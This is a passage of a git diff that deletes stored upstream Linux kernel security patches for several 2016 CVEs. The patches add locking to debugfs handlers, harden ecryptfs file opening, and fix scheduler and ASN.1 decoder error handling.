-@@ -124,32 +124,22 @@ static ssize_t panel_debug_base_reg_write(struct file *file,
- 		const char __user *user_buf, size_t count, loff_t *ppos)
- {
- 	struct mdss_debug_base *dbg = file->private_data;
--
--	u32 cnt, tmp, i;
--	u32 len = 0;
- 	char buf[PANEL_TX_MAX_BUF] = {0x0};
--	char *p = NULL;
- 	char reg[PANEL_TX_MAX_BUF] = {0x0};
-+	u32 len = 0, step = 0, value = 0;
-+	char *bufp;
- 
- 	struct mdss_data_type *mdata = mdss_res;
--	struct mdss_mdp_ctl *ctl = mdata->ctl_off + 0;
--	struct mdss_panel_data *panel_data = ctl->panel_data;
--	struct mdss_dsi_ctrl_pdata *ctrl_pdata = container_of(panel_data,
--					struct mdss_dsi_ctrl_pdata, panel_data);
--
-+	struct mdss_mdp_ctl *ctl;
-+	struct mdss_dsi_ctrl_pdata *ctrl_pdata;
- 	struct dsi_cmd_desc dsi_write_cmd = {
--		{DTYPE_GEN_LWRITE, 1, 0, 0, 0, 0/*len*/}, reg};
-+		{0/*data type*/, 1, 0, 0, 0, 0/* len */}, reg};
- 	struct dcs_cmd_req cmdreq;
- 
--	cmdreq.cmds = &dsi_write_cmd;
--	cmdreq.cmds_cnt = 1;
--	cmdreq.flags = CMD_REQ_COMMIT;
--	cmdreq.rlen = 0;
--	cmdreq.cb = NULL;
--
- 	if (!dbg || !mdata)
- 		return -ENODEV;
- 
-+	/* get command string from user */
- 	if (count >= sizeof(buf))
- 		return -EFAULT;
- 
-@@ -158,26 +148,38 @@ static ssize_t panel_debug_base_reg_write(struct file *file,
- 
- 	buf[count] = 0;	/* end of string */
- 
--	len = count / 3;
--
-+	bufp = buf;
-+	while (sscanf(bufp, "%x%n", &value, &step) > 0) {
-+		reg[len++] = value;
-+		if (len >= PANEL_TX_MAX_BUF) {
-+			pr_err("wrong input reg len\n");
-+			return -EFAULT;
-+		}
-+		bufp += step;
-+	}
- 	if (len < PANEL_CMD_MIN_TX_COUNT) {
- 		pr_err("wrong input reg len\n");
- 		return -EFAULT;
- 	}
- 
--	for (i = 0; i < len; i++) {
--		p = buf + i * 3;
--		p[2] = 0;
--		pr_debug("p[%d] = %p:%s\n", i, p, p);
--		cnt = sscanf(p, "%x", &tmp);
--		reg[i] = tmp;
--		pr_debug("reg[%d] = %x\n", i, (int)reg[i]);
--	}
-+	/* put command to cmdlist */
-+	dsi_write_cmd.dchdr.dtype = dbg->cmd_data_type;
-+	dsi_write_cmd.dchdr.dlen = len;
-+	dsi_write_cmd.payload = reg;
-+
-+	cmdreq.cmds = &dsi_write_cmd;
-+	cmdreq.cmds_cnt = 1;
-+	cmdreq.flags = CMD_REQ_COMMIT;
-+	cmdreq.rlen = 0;
-+	cmdreq.cb = NULL;
-+
-+	ctl = mdata->ctl_off + 0;
-+	ctrl_pdata = container_of(ctl->panel_data,
-+		struct mdss_dsi_ctrl_pdata, panel_data);
- 
- 	if (mdata->debug_inf.debug_enable_clock)
- 		mdata->debug_inf.debug_enable_clock(1);
- 
--	dsi_write_cmd.dchdr.dlen = len;
- 	mdss_dsi_cmdlist_put(ctrl_pdata, &cmdreq);
- 
- 	if (mdata->debug_inf.debug_enable_clock)
-@@ -262,7 +264,7 @@ int panel_debug_register_base(const char *name, void __iomem *base,
- 	struct mdss_data_type *mdata = mdss_res;
- 	struct mdss_debug_data *mdd;
- 	struct mdss_debug_base *dbg;
--	struct dentry *ent_off, *ent_reg;
-+	struct dentry *ent_off, *ent_reg, *ent_type;
- 	char dn[PANEL_DATA_NODE_LEN] = "";
- 	int prefix_len = 0;
- 
-@@ -279,10 +281,20 @@ int panel_debug_register_base(const char *name, void __iomem *base,
- 	dbg->max_offset = max_offset;
- 	dbg->off = 0x0a;
- 	dbg->cnt = 0x01;
-+	dbg->cmd_data_type = DTYPE_DCS_LWRITE;
- 
- 	if (name)
- 		prefix_len = snprintf(dn, sizeof(dn), "%s_", name);
- 
-+	strlcpy(dn + prefix_len, "cmd_data_type", sizeof(dn) - prefix_len);
-+	ent_type = debugfs_create_x8(dn, 0644, mdd->root,
-+		(u8 *)&dbg->cmd_data_type);
-+
-+	if (IS_ERR_OR_NULL(ent_type)) {
-+		pr_err("debugfs_create_file: data_type fail\n");
-+		goto type_fail;
-+	}
-+
- 	strlcpy(dn + prefix_len, "off", sizeof(dn) - prefix_len);
- 	ent_off = debugfs_create_file(dn, 0644, mdd->root,
- 					dbg, &panel_off_fops);
-@@ -303,9 +315,12 @@ int panel_debug_register_base(const char *name, void __iomem *base,
- 	list_add(&dbg->head, &mdd->base_list);
- 
- 	return 0;
-+
- reg_fail:
- 	debugfs_remove(ent_off);
- off_fail:
-+	debugfs_remove(ent_type);
-+type_fail:
- 	kfree(dbg);
- 	return -ENODEV;
- }
-diff --git a/drivers/video/msm/mdss/mdss_debug.h b/drivers/video/msm/mdss/mdss_debug.h
-index ef665e7..1bb54d2 100644
---- a/drivers/video/msm/mdss/mdss_debug.h
-+++ b/drivers/video/msm/mdss/mdss_debug.h
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2014, 2017 The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -49,6 +49,7 @@ struct mdss_debug_base {
- 	void __iomem *base;
- 	size_t off;
- 	size_t cnt;
-+	u8 cmd_data_type;
- 	size_t max_offset;
- 	char *buf;
- 	size_t buf_len;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10294/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-10294/ANY/0001.patch
deleted file mode 100644
index efdca413..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10294/ANY/0001.patch
+++ /dev/null
@@ -1,122 +0,0 @@
-From 9e9bc51ffb8a298f0be5befe346762cdb6e1d49c Mon Sep 17 00:00:00 2001
-From: ansharma <ansharma@codeaurora.org>
-Date: Wed, 18 Jan 2017 16:46:38 +0530
-Subject: power: qpnp-fg: Fix possible race condition in FG debugfs
-
-There is a possible race condition when FG debugfs files are concurrently
-accessed by multiple threads. Fix this.
-
-CRs-Fixed: 1105481
-Change-Id: I154e7f3cdd8d51cf67ef1dfd9d78f423f183cb64
-Signed-off-by: ansharma <ansharma@codeaurora.org>
----
- drivers/power/qpnp-fg.c | 34 ++++++++++++++++++++++++++--------
- 1 file changed, 26 insertions(+), 8 deletions(-)
-
-diff --git a/drivers/power/qpnp-fg.c b/drivers/power/qpnp-fg.c
-index 182b562..1e2fefc 100644
---- a/drivers/power/qpnp-fg.c
-+++ b/drivers/power/qpnp-fg.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2014-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2014-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -669,6 +669,7 @@ struct fg_trans {
- 	struct fg_chip *chip;
- 	struct fg_log_buffer *log; /* log buffer */
- 	u8 *data;	/* fg data that is read */
-+	struct mutex memif_dfs_lock; /* Prevent thread concurrency */
- };
- 
- struct fg_dbgfs {
-@@ -7514,6 +7515,7 @@ static int fg_memif_data_open(struct inode *inode, struct file *file)
- 	trans->addr = dbgfs_data.addr;
- 	trans->chip = dbgfs_data.chip;
- 	trans->offset = trans->addr;
-+	mutex_init(&trans->memif_dfs_lock);
- 
- 	file->private_data = trans;
- 	return 0;
-@@ -7525,6 +7527,7 @@ static int fg_memif_dfs_close(struct inode *inode, struct file *file)
- 
- 	if (trans && trans->log && trans->data) {
- 		file->private_data = NULL;
-+		mutex_destroy(&trans->memif_dfs_lock);
- 		kfree(trans->log);
- 		kfree(trans->data);
- 		kfree(trans);
-@@ -7682,10 +7685,13 @@ static ssize_t fg_memif_dfs_reg_read(struct file *file, char __user *buf,
- 	size_t ret;
- 	size_t len;
- 
-+	mutex_lock(&trans->memif_dfs_lock);
- 	/* Is the the log buffer empty */
- 	if (log->rpos >= log->wpos) {
--		if (get_log_data(trans) <= 0)
--			return 0;
-+		if (get_log_data(trans) <= 0) {
-+			len = 0;
-+			goto unlock_mutex;
-+		}
- 	}
- 
- 	len = min(count, log->wpos - log->rpos);
-@@ -7693,7 +7699,8 @@ static ssize_t fg_memif_dfs_reg_read(struct file *file, char __user *buf,
- 	ret = copy_to_user(buf, &log->data[log->rpos], len);
- 	if (ret == len) {
- 		pr_err("error copy sram register values to user\n");
--		return -EFAULT;
-+		len = -EFAULT;
-+		goto unlock_mutex;
- 	}
- 
- 	/* 'ret' is the number of bytes not copied */
-@@ -7701,6 +7708,9 @@ static ssize_t fg_memif_dfs_reg_read(struct file *file, char __user *buf,
- 
- 	*ppos += len;
- 	log->rpos += len;
-+
-+unlock_mutex:
-+	mutex_unlock(&trans->memif_dfs_lock);
- 	return len;
- }
- 
-@@ -7721,14 +7731,20 @@ static ssize_t fg_memif_dfs_reg_write(struct file *file, const char __user *buf,
- 	int cnt = 0;
- 	u8  *values;
- 	size_t ret = 0;
-+	char *kbuf;
-+	u32 offset;
- 
- 	struct fg_trans *trans = file->private_data;
--	u32 offset = trans->offset;
-+
-+	mutex_lock(&trans->memif_dfs_lock);
-+	offset = trans->offset;
- 
- 	/* Make a copy of the user data */
--	char *kbuf = kmalloc(count + 1, GFP_KERNEL);
--	if (!kbuf)
--		return -ENOMEM;
-+	kbuf = kmalloc(count + 1, GFP_KERNEL);
-+	if (!kbuf) {
-+		ret = -ENOMEM;
-+		goto unlock_mutex;
-+	}
- 
- 	ret = copy_from_user(kbuf, buf, count);
- 	if (ret == count) {
-@@ -7767,6 +7783,8 @@ static ssize_t fg_memif_dfs_reg_write(struct file *file, const char __user *buf,
- 
- free_buf:
- 	kfree(kbuf);
-+unlock_mutex:
-+	mutex_unlock(&trans->memif_dfs_lock);
- 	return ret;
- }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10295/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-10295/ANY/0001.patch
deleted file mode 100644
index 08b35d6f..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10295/ANY/0001.patch
+++ /dev/null
@@ -1,238 +0,0 @@
-From f11ae3df500bc2a093ddffee6ea40da859de0fa9 Mon Sep 17 00:00:00 2001
-From: ansharma <ansharma@codeaurora.org>
-Date: Thu, 19 Jan 2017 20:22:14 +0530
-Subject: leds: qpnp-flash: Fix possible race condition in debugfs
-
-There is a possible race condition when debugfs files are concurrently
-accessed by multiple threads. Fix this.
-
-CRs-Fixed: 1109420, 1109326
-Change-Id: I19e9107079ac8d039b12a37ae612727f824552d4
-Signed-off-by: ansharma <ansharma@codeaurora.org>
----
- drivers/leds/leds-qpnp-flash.c | 80 ++++++++++++++++++++++++++++++------------
- 1 file changed, 57 insertions(+), 23 deletions(-)
-
-diff --git a/drivers/leds/leds-qpnp-flash.c b/drivers/leds/leds-qpnp-flash.c
-index 43298a7..56ba8f5 100644
---- a/drivers/leds/leds-qpnp-flash.c
-+++ b/drivers/leds/leds-qpnp-flash.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2014-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2014-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -225,6 +225,7 @@ struct flash_led_platform_data {
- };
- 
- struct qpnp_flash_led_buffer {
-+	struct mutex debugfs_lock; /* Prevent thread concurrency */
- 	size_t rpos;
- 	size_t wpos;
- 	size_t len;
-@@ -280,6 +281,7 @@ static int flash_led_dbgfs_file_open(struct qpnp_flash_led *led,
- 	log->rpos = 0;
- 	log->wpos = 0;
- 	log->len = logbufsize - sizeof(*log);
-+	mutex_init(&log->debugfs_lock);
- 	led->log = log;
- 
- 	led->buffer_cnt = 1;
-@@ -301,20 +303,26 @@ static int flash_led_dfs_close(struct inode *inode, struct file *file)
- 
- 	if (led && led->log) {
- 		file->private_data = NULL;
-+		mutex_destroy(&led->log->debugfs_lock);
- 		kfree(led->log);
- 	}
- 
- 	return 0;
- }
- 
-+#define MIN_BUFFER_WRITE_LEN		20
- static int print_to_log(struct qpnp_flash_led_buffer *log,
- 					const char *fmt, ...)
- {
- 	va_list args;
- 	int cnt;
--	char *log_buf = &log->data[log->wpos];
-+	char *log_buf;
- 	size_t size = log->len - log->wpos;
- 
-+	if (size < MIN_BUFFER_WRITE_LEN)
-+		return 0;	/* not enough buffer left */
-+
-+	log_buf = &log->data[log->wpos];
- 	va_start(args, fmt);
- 	cnt = vscnprintf(log_buf, size, fmt, args);
- 	va_end(args);
-@@ -328,12 +336,14 @@ static ssize_t flash_led_dfs_latched_reg_read(struct file *fp, char __user *buf,
- 	struct qpnp_flash_led *led = fp->private_data;
- 	struct qpnp_flash_led_buffer *log = led->log;
- 	u8 val;
--	int rc;
-+	int rc = 0;
- 	size_t len;
- 	size_t ret;
- 
--	if (log->rpos >= log->wpos && led->buffer_cnt == 0)
--		return 0;
-+	mutex_lock(&log->debugfs_lock);
-+	if ((log->rpos >= log->wpos && led->buffer_cnt == 0) ||
-+			((log->len - log->wpos) < MIN_BUFFER_WRITE_LEN))
-+		goto unlock_mutex;
- 
- 	rc = spmi_ext_register_readl(led->spmi_dev->ctrl,
- 		led->spmi_dev->sid, INT_LATCHED_STS(led->base), &val, 1);
-@@ -341,17 +351,17 @@ static ssize_t flash_led_dfs_latched_reg_read(struct file *fp, char __user *buf,
- 		dev_err(&led->spmi_dev->dev,
- 				"Unable to read from address %x, rc(%d)\n",
- 				INT_LATCHED_STS(led->base), rc);
--		return -EINVAL;
-+		goto unlock_mutex;
- 	}
- 	led->buffer_cnt--;
- 
- 	rc = print_to_log(log, "0x%05X ", INT_LATCHED_STS(led->base));
- 	if (rc == 0)
--		return rc;
-+		goto unlock_mutex;
- 
- 	rc = print_to_log(log, "0x%02X ", val);
- 	if (rc == 0)
--		return rc;
-+		goto unlock_mutex;
- 
- 	if (log->wpos > 0 && log->data[log->wpos - 1] == ' ')
- 		log->data[log->wpos - 1] = '\n';
-@@ -361,36 +371,43 @@ static ssize_t flash_led_dfs_latched_reg_read(struct file *fp, char __user *buf,
- 	ret = copy_to_user(buf, &log->data[log->rpos], len);
- 	if (ret) {
- 		pr_err("error copy register value to user\n");
--		return -EFAULT;
-+		rc = -EFAULT;
-+		goto unlock_mutex;
- 	}
- 
- 	len -= ret;
- 	*ppos += len;
- 	log->rpos += len;
- 
--	return len;
-+	rc = len;
-+
-+unlock_mutex:
-+	mutex_unlock(&log->debugfs_lock);
-+	return rc;
- }
- 
- static ssize_t flash_led_dfs_fault_reg_read(struct file *fp, char __user *buf,
- 					size_t count, loff_t *ppos) {
- 	struct qpnp_flash_led *led = fp->private_data;
- 	struct qpnp_flash_led_buffer *log = led->log;
--	int rc;
-+	int rc = 0;
- 	size_t len;
- 	size_t ret;
- 
--	if (log->rpos >= log->wpos && led->buffer_cnt == 0)
--		return 0;
-+	mutex_lock(&log->debugfs_lock);
-+	if ((log->rpos >= log->wpos && led->buffer_cnt == 0) ||
-+			((log->len - log->wpos) < MIN_BUFFER_WRITE_LEN))
-+		goto unlock_mutex;
- 
- 	led->buffer_cnt--;
- 
- 	rc = print_to_log(log, "0x%05X ", FLASH_LED_FAULT_STATUS(led->base));
- 	if (rc == 0)
--		return rc;
-+		goto unlock_mutex;
- 
- 	rc = print_to_log(log, "0x%02X ", led->fault_reg);
- 	if (rc == 0)
--		return rc;
-+		goto unlock_mutex;
- 
- 	if (log->wpos > 0 && log->data[log->wpos - 1] == ' ')
- 		log->data[log->wpos - 1] = '\n';
-@@ -400,14 +417,19 @@ static ssize_t flash_led_dfs_fault_reg_read(struct file *fp, char __user *buf,
- 	ret = copy_to_user(buf, &log->data[log->rpos], len);
- 	if (ret) {
- 		pr_err("error copy register value to user\n");
--		return -EFAULT;
-+		rc = -EFAULT;
-+		goto unlock_mutex;
- 	}
- 
- 	len -= ret;
- 	*ppos += len;
- 	log->rpos += len;
- 
--	return len;
-+	rc = len;
-+
-+unlock_mutex:
-+	mutex_unlock(&log->debugfs_lock);
-+	return rc;
- }
- 
- static ssize_t flash_led_dfs_fault_reg_enable(struct file *file,
-@@ -420,10 +442,14 @@ static ssize_t flash_led_dfs_fault_reg_enable(struct file *file,
- 	size_t ret = 0;
- 
- 	struct qpnp_flash_led *led = file->private_data;
--	char *kbuf = kmalloc(count + 1, GFP_KERNEL);
-+	char *kbuf;
- 
--	if (!kbuf)
--		return -ENOMEM;
-+	mutex_lock(&led->log->debugfs_lock);
-+	kbuf = kmalloc(count + 1, GFP_KERNEL);
-+	if (!kbuf) {
-+		ret = -ENOMEM;
-+		goto unlock_mutex;
-+	}
- 
- 	ret = copy_from_user(kbuf, buf, count);
- 	if (!ret) {
-@@ -452,6 +478,8 @@ static ssize_t flash_led_dfs_fault_reg_enable(struct file *file,
- 
- free_buf:
- 	kfree(kbuf);
-+unlock_mutex:
-+	mutex_unlock(&led->log->debugfs_lock);
- 	return ret;
- }
- 
-@@ -464,10 +492,14 @@ static ssize_t flash_led_dfs_dbg_enable(struct file *file,
- 	int data;
- 	size_t ret = 0;
- 	struct qpnp_flash_led *led = file->private_data;
--	char *kbuf = kmalloc(count + 1, GFP_KERNEL);
-+	char *kbuf;
- 
--	if (!kbuf)
--		return -ENOMEM;
-+	mutex_lock(&led->log->debugfs_lock);
-+	kbuf = kmalloc(count + 1, GFP_KERNEL);
-+	if (!kbuf) {
-+		ret = -ENOMEM;
-+		goto unlock_mutex;
-+	}
- 
- 	ret = copy_from_user(kbuf, buf, count);
- 	if (ret == count) {
-@@ -495,6 +527,8 @@ static ssize_t flash_led_dfs_dbg_enable(struct file *file,
- 
- free_buf:
- 	kfree(kbuf);
-+unlock_mutex:
-+	mutex_unlock(&led->log->debugfs_lock);
- 	return ret;
- }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10296/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-10296/ANY/0001.patch
deleted file mode 100644
index ac233c61..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10296/ANY/0001.patch
+++ /dev/null
@@ -1,88 +0,0 @@
-From a5e46d8635a2e28463b365aacdeab6750abd0d49 Mon Sep 17 00:00:00 2001
-From: Sahitya Tummala <stummala@codeaurora.org>
-Date: Fri, 3 Feb 2017 13:24:19 +0530
-Subject: uio: fix potential use after free issue when accessing debug_buffer
-
-The variable debug_buffer is a global variable which is allocated
-and free'd when open/close is called on debugfs file -
-"/sys/kernel/debug/rmt_storage/info". The current code doesn't
-have locks to handle concurrent accesses to the above file.
-This results into use after free issue when debug_buffer is
-accessed by two threads at the same time. Fix this by adding
-a mutex lock to protect this global variable.
-
-Change-Id: I6bc3f0ae2d7fca3ca9fe8561612f5863b6c3268a
-Signed-off-by: Sahitya Tummala <stummala@codeaurora.org>
----
- drivers/uio/msm_sharedmem/sharedmem_qmi.c | 17 ++++++++++++++---
- 1 file changed, 14 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/uio/msm_sharedmem/sharedmem_qmi.c b/drivers/uio/msm_sharedmem/sharedmem_qmi.c
-index 48fb17e..fd95dee 100644
---- a/drivers/uio/msm_sharedmem/sharedmem_qmi.c
-+++ b/drivers/uio/msm_sharedmem/sharedmem_qmi.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2014-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2014-2015, 2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -223,6 +223,7 @@ static int sharedmem_qmi_req_cb(struct qmi_handle *handle, void *conn_h,
- #define DEBUG_BUF_SIZE (2048)
- static char *debug_buffer;
- static u32 debug_data_size;
-+static struct mutex dbg_buf_lock;	/* mutex for debug_buffer */
- 
- static ssize_t debug_read(struct file *file, char __user *buf,
- 			  size_t count, loff_t *file_pos)
-@@ -279,21 +280,29 @@ static int debug_open(struct inode *inode, struct file *file)
- {
- 	u32 buffer_size;
- 
--	if (debug_buffer != NULL)
-+	mutex_lock(&dbg_buf_lock);
-+	if (debug_buffer != NULL) {
-+		mutex_unlock(&dbg_buf_lock);
- 		return -EBUSY;
-+	}
- 	buffer_size = DEBUG_BUF_SIZE;
- 	debug_buffer = kzalloc(buffer_size, GFP_KERNEL);
--	if (debug_buffer == NULL)
-+	if (debug_buffer == NULL) {
-+		mutex_unlock(&dbg_buf_lock);
- 		return -ENOMEM;
-+	}
- 	debug_data_size = fill_debug_info(debug_buffer, buffer_size);
-+	mutex_unlock(&dbg_buf_lock);
- 	return 0;
- }
- 
- static int debug_close(struct inode *inode, struct file *file)
- {
-+	mutex_lock(&dbg_buf_lock);
- 	kfree(debug_buffer);
- 	debug_buffer = NULL;
- 	debug_data_size = 0;
-+	mutex_unlock(&dbg_buf_lock);
- 	return 0;
- }
- 
-@@ -324,6 +333,7 @@ static void debugfs_init(void)
- {
- 	struct dentry *f_ent;
- 
-+	mutex_init(&dbg_buf_lock);
- 	dir_ent = debugfs_create_dir("rmt_storage", NULL);
- 	if (IS_ERR(dir_ent)) {
- 		pr_err("Failed to create debug_fs directory\n");
-@@ -352,6 +362,7 @@ static void debugfs_init(void)
- static void debugfs_exit(void)
- {
- 	debugfs_remove_recursive(dir_ent);
-+	mutex_destroy(&dbg_buf_lock);
- }
- 
- static void sharedmem_qmi_svc_recv_msg(struct work_struct *work)
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-1583/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2016-1583/ANY/0002.patch
deleted file mode 100644
index a3e2dca7..00000000
--- a/Patches/Linux_CVEs/CVE-2016-1583/ANY/0002.patch
+++ /dev/null
@@ -1,59 +0,0 @@
-From 2f36db71009304b3f0b95afacd8eba1f9f046b87 Mon Sep 17 00:00:00 2001
-From: Jann Horn <jannh@google.com>
-Date: Wed, 1 Jun 2016 11:55:06 +0200
-Subject: ecryptfs: forbid opening files without mmap handler
-
-This prevents users from triggering a stack overflow through a recursive
-invocation of pagefault handling that involves mapping procfs files into
-virtual memory.
-
-Signed-off-by: Jann Horn <jannh@google.com>
-Acked-by: Tyler Hicks <tyhicks@canonical.com>
-Cc: stable@vger.kernel.org
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
----
- fs/ecryptfs/kthread.c | 13 +++++++++++--
- 1 file changed, 11 insertions(+), 2 deletions(-)
-
-diff --git a/fs/ecryptfs/kthread.c b/fs/ecryptfs/kthread.c
-index 866bb18..e818f5a 100644
---- a/fs/ecryptfs/kthread.c
-+++ b/fs/ecryptfs/kthread.c
-@@ -25,6 +25,7 @@
- #include <linux/slab.h>
- #include <linux/wait.h>
- #include <linux/mount.h>
-+#include <linux/file.h>
- #include "ecryptfs_kernel.h"
- 
- struct ecryptfs_open_req {
-@@ -147,7 +148,7 @@ int ecryptfs_privileged_open(struct file **lower_file,
- 	flags |= IS_RDONLY(d_inode(lower_dentry)) ? O_RDONLY : O_RDWR;
- 	(*lower_file) = dentry_open(&req.path, flags, cred);
- 	if (!IS_ERR(*lower_file))
--		goto out;
-+		goto have_file;
- 	if ((flags & O_ACCMODE) == O_RDONLY) {
- 		rc = PTR_ERR((*lower_file));
- 		goto out;
-@@ -165,8 +166,16 @@ int ecryptfs_privileged_open(struct file **lower_file,
- 	mutex_unlock(&ecryptfs_kthread_ctl.mux);
- 	wake_up(&ecryptfs_kthread_ctl.wait);
- 	wait_for_completion(&req.done);
--	if (IS_ERR(*lower_file))
-+	if (IS_ERR(*lower_file)) {
- 		rc = PTR_ERR(*lower_file);
-+		goto out;
-+	}
-+have_file:
-+	if ((*lower_file)->f_op->mmap == NULL) {
-+		fput(*lower_file);
-+		*lower_file = NULL;
-+		rc = -EMEDIUMTYPE;
-+	}
- out:
- 	return rc;
- }
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-1583/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2016-1583/ANY/0003.patch
deleted file mode 100644
index 1aef35de..00000000
--- a/Patches/Linux_CVEs/CVE-2016-1583/ANY/0003.patch
+++ /dev/null
@@ -1,36 +0,0 @@
-From 29d6455178a09e1dc340380c582b13356227e8df Mon Sep 17 00:00:00 2001
-From: Jann Horn <jannh@google.com>
-Date: Wed, 1 Jun 2016 11:55:07 +0200
-Subject: sched: panic on corrupted stack end
-
-Until now, hitting this BUG_ON caused a recursive oops (because oops
-handling involves do_exit(), which calls into the scheduler, which in
-turn raises an oops), which caused stuff below the stack to be
-overwritten until a panic happened (e.g.  via an oops in interrupt
-context, caused by the overwritten CPU index in the thread_info).
-
-Just panic directly.
-
-Signed-off-by: Jann Horn <jannh@google.com>
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
----
- kernel/sched/core.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/kernel/sched/core.c b/kernel/sched/core.c
-index d1f7149..11546a6 100644
---- a/kernel/sched/core.c
-+++ b/kernel/sched/core.c
-@@ -3047,7 +3047,8 @@ static noinline void __schedule_bug(struct task_struct *prev)
- static inline void schedule_debug(struct task_struct *prev)
- {
- #ifdef CONFIG_SCHED_STACK_END_CHECK
--	BUG_ON(task_stack_end_corrupted(prev));
-+	if (task_stack_end_corrupted(prev))
-+		panic("corrupted stack end detected inside scheduler\n");
- #endif
- 
- 	if (unlikely(in_atomic_preempt_off())) {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2053/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2053/ANY/0001.patch
deleted file mode 100644
index 53718a7b..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2053/ANY/0001.patch
+++ /dev/null
@@ -1,125 +0,0 @@
-From 0d62e9dd6da45bbf0f33a8617afc5fe774c8f45f Mon Sep 17 00:00:00 2001
-From: David Howells <dhowells@redhat.com>
-Date: Wed, 5 Aug 2015 12:54:46 +0100
-Subject: ASN.1: Fix non-match detection failure on data overrun
-
-If the ASN.1 decoder is asked to parse a sequence of objects, non-optional
-matches get skipped if there's no more data to be had rather than a
-data-overrun error being reported.
-
-This is due to the code segment that decides whether to skip optional
-matches (ie. matches that could get ignored because an element is marked
-OPTIONAL in the grammar) due to a lack of data also skips non-optional
-elements if the data pointer has reached the end of the buffer.
-
-This can be tested with the data decoder for the new RSA akcipher algorithm
-that takes three non-optional integers.  Currently, it skips the last
-integer if there is insufficient data.
-
-Without the fix, #defining DEBUG in asn1_decoder.c will show something
-like:
-
-	next_op: pc=0/13 dp=0/270 C=0 J=0
-	- match? 30 30 00
-	- TAG: 30 266 CONS
-	next_op: pc=2/13 dp=4/270 C=1 J=0
-	- match? 02 02 00
-	- TAG: 02 257
-	- LEAF: 257
-	next_op: pc=5/13 dp=265/270 C=1 J=0
-	- match? 02 02 00
-	- TAG: 02 3
-	- LEAF: 3
-	next_op: pc=8/13 dp=270/270 C=1 J=0
-	next_op: pc=11/13 dp=270/270 C=1 J=0
-	- end cons t=4 dp=270 l=270/270
-
-The next_op line for pc=8/13 should be followed by a match line.
-
-This is not exploitable for X.509 certificates by means of shortening the
-message and fixing up the ASN.1 CONS tags because:
-
- (1) The relevant records being built up are cleared before use.
-
- (2) If the message is shortened sufficiently to remove the public key, the
-     ASN.1 parse of the RSA key will fail quickly due to a lack of data.
-
- (3) Extracted signature data is either turned into MPIs (which cope with a
-     0 length) or is simpler integers specifying algoritms and suchlike
-     (which can validly be 0); and
-
- (4) The AKID and SKID extensions are optional and their removal is handled
-     without risking passing a NULL to asymmetric_key_generate_id().
-
- (5) If the certificate is truncated sufficiently to remove the subject,
-     issuer or serialNumber then the ASN.1 decoder will fail with a 'Cons
-     stack underflow' return.
-
-This is not exploitable for PKCS#7 messages by means of removal of elements
-from such a message from the tail end of a sequence:
-
- (1) Any shortened X.509 certs embedded in the PKCS#7 message are survivable
-     as detailed above.
-
- (2) The message digest content isn't used if it shows a NULL pointer,
-     similarly, the authattrs aren't used if that shows a NULL pointer.
-
- (3) A missing signature results in a NULL MPI - which the MPI routines deal
-     with.
-
- (4) If data is NULL, it is expected that the message has detached content and
-     that is handled appropriately.
-
- (5) If the serialNumber is excised, the unconditional action associated
-     with it will pick up the containing SEQUENCE instead, so no NULL
-     pointer will be seen here.
-
-     If both the issuer and the serialNumber are excised, the ASN.1 decode
-     will fail with an 'Unexpected tag' return.
-
-     In either case, there's no way to get to asymmetric_key_generate_id()
-     with a NULL pointer.
-
- (6) Other fields are decoded to simple integers.  Shortening the message
-     to omit an algorithm ID field will cause checks on this to fail early
-     in the verification process.
-
-
-This can also be tested by snipping objects off of the end of the ASN.1 stream
-such that mandatory tags are removed - or even from the end of internal
-SEQUENCEs.  If any mandatory tag is missing, the error EBADMSG *should* be
-produced.  Without this patch ERANGE or ENOPKG might be produced or the parse
-may apparently succeed, perhaps with ENOKEY or EKEYREJECTED being produced
-later, depending on what gets snipped.
-
-Just snipping off the final BIT_STRING or OCTET_STRING from either sample
-should be a start since both are mandatory and neither will cause an EBADMSG
-without the patches
-
-Reported-by: Marcel Holtmann <marcel@holtmann.org>
-Signed-off-by: David Howells <dhowells@redhat.com>
-Tested-by: Marcel Holtmann <marcel@holtmann.org>
-Reviewed-by: David Woodhouse <David.Woodhouse@intel.com>
----
- lib/asn1_decoder.c | 5 ++---
- 1 file changed, 2 insertions(+), 3 deletions(-)
-
-diff --git a/lib/asn1_decoder.c b/lib/asn1_decoder.c
-index 55980d7..3f74dd3 100644
---- a/lib/asn1_decoder.c
